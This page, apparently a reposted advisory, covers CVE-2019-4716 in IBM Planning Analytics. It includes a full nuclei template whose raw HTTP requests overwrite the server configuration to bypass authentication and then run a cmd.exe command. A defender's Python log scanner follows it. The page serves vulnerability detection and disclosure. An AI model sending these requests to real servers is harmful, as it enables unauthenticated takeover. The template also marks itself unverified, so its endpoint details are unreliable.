IBM Planning Analytics Authentication Bypass & Remote Code Execution Vulnerability

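Vulnerability Information

Vulnerability name: IBM Planning Analytics Authentication Bypass & Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2019-4716

Vulnerability type: Authorization bypass

Severity: Critical

Description: IBM Planning Analytics is enterprise planning and analytics software developed by IBM, widely used for financial planning, budgeting and forecasting. It supports data manipulation and analysis through TM1 scripts and is an important part of enterprise decision-support systems. Versions 2.0.0 through 2.0.8 contain a critical configuration overwrite vulnerability that lets an attacker bypass authentication without valid credentials, log in as administrator and execute arbitrary code. The root cause is improperly configured unauthenticated access, which lets an attacker overwrite the system configuration and then use TM1 scripting for privilege escalation and remote code execution. Exploitation can give an attacker full control of the system: executing arbitrary commands, accessing sensitive data, and even disrupting system services. Because the attack requires no authentication and can be automated, it poses a very high security risk to organizations running affected versions.

Vendor: IBM

Product: IBM Planning Analytics

Affected versions: 2.0.0 <= version <= 2.0.8

Source: https://github.com/projectdiscovery/nuclei-templates/blob/6a7e8750d20a675a40656a8d9a4ba5d0ab2c6424/http%2Fcves%2F2019%2FCVE-2019-4716.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details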


id: CVE-2019-4716

info:
  name: IBM Planning Analytics 2.0.0-2.0.8 - Authentication Bypass & Remote Code Execution
  author: pranjal
  severity: critical
  description: |
    IBM Planning Analytics versions 2.0.0 through 2.0.8 contain a configuration overwrite caused by unauthenticated access,
    letting attackers login as 'admin' and execute code as root or SYSTEM via TM1 scripting. The vulnerability allows
    authentication bypass and remote code execution without valid credentials.
  impact: |
    An attacker can exploit this vulnerability to gain administrative access and execute arbitrary code with elevated privileges.
  remediation: |
    Upgrade IBM Planning Analytics to version 2.0.9 or later to fix the authentication bypass and remote code execution vulnerability.
  reference:
    - https://packetstormsecurity.com/files/156953/IBM-Cognos-TM1-IBM-Planning-Analytics-Server-Configuration-Overwrite-Code-Execution.html
    - https://seclists.org/fulldisclosure/2020/Mar/44
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4716
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-4716
    cwe-id: CWE-287
    epss-score: 0.98765
    epss-percentile: 0.99876
    cpe: cpe:2.3:a:ibm:planning_analytics:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: ibm
    product: planning_analytics
    verified: false
    # Debug Information for Validation
    debug-info: |
      To validate this template:
      1. Set up IBM Planning Analytics 2.0.8 (vulnerable version)
      2. Run: nuclei -t CVE-2019-4716.yaml -u http://target:port -debug
      3. Expected debug output should show:
         - Step 1: Configuration endpoint accessible (200 OK)
         - Step 2: Configuration overwrite successful (200/201)
         - Step 3: RCE command execution successful with randstr in response
      4. Alternative: Use TM1 REST API detection method
    test-environment: |
      Docker setup for testing:
      - IBM Planning Analytics 2.0.8 container
      - Expose port 9510 (default TM1 port)
      - Enable TM1 REST API
      - Disable authentication for testing
  tags: cve,cve2019,ibm,planning-analytics,tm1,rce,auth-bypass,packetstorm

flow: http(1) && http(2) && http(3)

http:
  # Step 1: Check if IBM Planning Analytics/TM1 is running
  - raw:
      - |
        GET /tm1/api/v1/Configuration HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200'
          - 'contains(tolower(body), "adminhost") || contains(tolower(body), "adminport") || contains(tolower(body), "configuration")'
        condition: and
        internal: true

  # Step 2: Authentication bypass via configuration overwrite
  - raw:
      - |
        POST /tm1/api/v1/Configuration/AdminHost HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

        {
          "AdminHost": "{{randstr}}",
          "AdminPort": 1234
        }

    matchers:
      - type: status
        status:
          - 200
          - 201
        internal: true

  # Step 3: RCE via TM1 scripting - Execute command to verify admin access
  - raw:
      - |
        POST /tm1/api/v1/ExecuteCommand HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

        {
          "Command": "ExecuteProcess('cmd.exe', '/c echo {{randstr}}')"
        }

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 201

      - type: regex
        regex:
          - "success|executed|completed|{{randstr}}"
        part: body

  # Alternative detection method for TM1 REST API endpoints
  - raw:
      - |
        GET /tm1/api/v1/Processes HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "processes|tm1|planning"
        part: body

      - type: word
        words:
          - "IBM"
          - "Planning"
          - "Analytics"
        part: body
        condition: or
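
A defender-side check for the request flow the template above sends, as an added example that is not part of the original page or of nuclei-templates: it scans access-log lines for the three request paths used in the template's steps and reports which clients reached them. The log format (common/combined access log from a proxy in front of TM1), the function name `scan` and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Request method/path pairs copied from steps 1-3 of the template on this page.
STEPS = [
    ("GET", "/tm1/api/v1/Configuration"),
    ("POST", "/tm1/api/v1/Configuration/AdminHost"),
    ("POST", "/tm1/api/v1/ExecuteCommand"),
]
STEP_KEYS = [(m, p.lower()) for m, p in STEPS]

# Assumption: common/combined access-log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def scan(lines):
    """Return {client_ip: finding} for clients that touched the template's endpoints.

    "attempt"            - the client sent step 2 or step 3 (any status).
    "sequence-succeeded" - steps 1, 2, 3 were all answered 2xx, in that order.
    """
    progress = defaultdict(int)  # per client: number of steps completed in order
    findings = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0].rstrip("/").lower()
        req = (m["method"], path)
        if req not in STEP_KEYS:
            continue
        ip, idx = m["ip"], STEP_KEYS.index(req)
        if idx >= 1:  # the write and execute steps are the ones worth alerting on
            findings.setdefault(ip, "attempt")
        if m["status"].startswith("2") and idx == progress[ip]:
            progress[ip] += 1
            if progress[ip] == len(STEP_KEYS):
                findings[ip] = "sequence-succeeded"
    return findings

# Constructed sample log lines (documentation address ranges).
SAMPLE = [
    '192.0.2.10 - - [18/Jul/2025:10:00:01 +0000] "GET /tm1/api/v1/Configuration HTTP/1.1" 200 512',
    '192.0.2.10 - - [18/Jul/2025:10:00:02 +0000] "POST /tm1/api/v1/Configuration/AdminHost HTTP/1.1" 200 0',
    '192.0.2.10 - - [18/Jul/2025:10:00:03 +0000] "POST /tm1/api/v1/ExecuteCommand HTTP/1.1" 200 64',
    '198.51.100.7 - - [18/Jul/2025:10:05:00 +0000] "POST /tm1/api/v1/ExecuteCommand HTTP/1.1" 401 0',
    '203.0.113.5 - - [18/Jul/2025:10:06:00 +0000] "GET /tm1/api/v1/Processes HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE).items():
        print(ip, finding)
```

A "sequence-succeeded" finding matches what the template itself treats as a confirmed hit, so hosts producing it should be prioritised for the upgrade to 2.0.9 or later named in the template's remediation field.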


http://example.com/2025/07/18/github_3047663111/
Author: lianccc
Published: July 18, 2025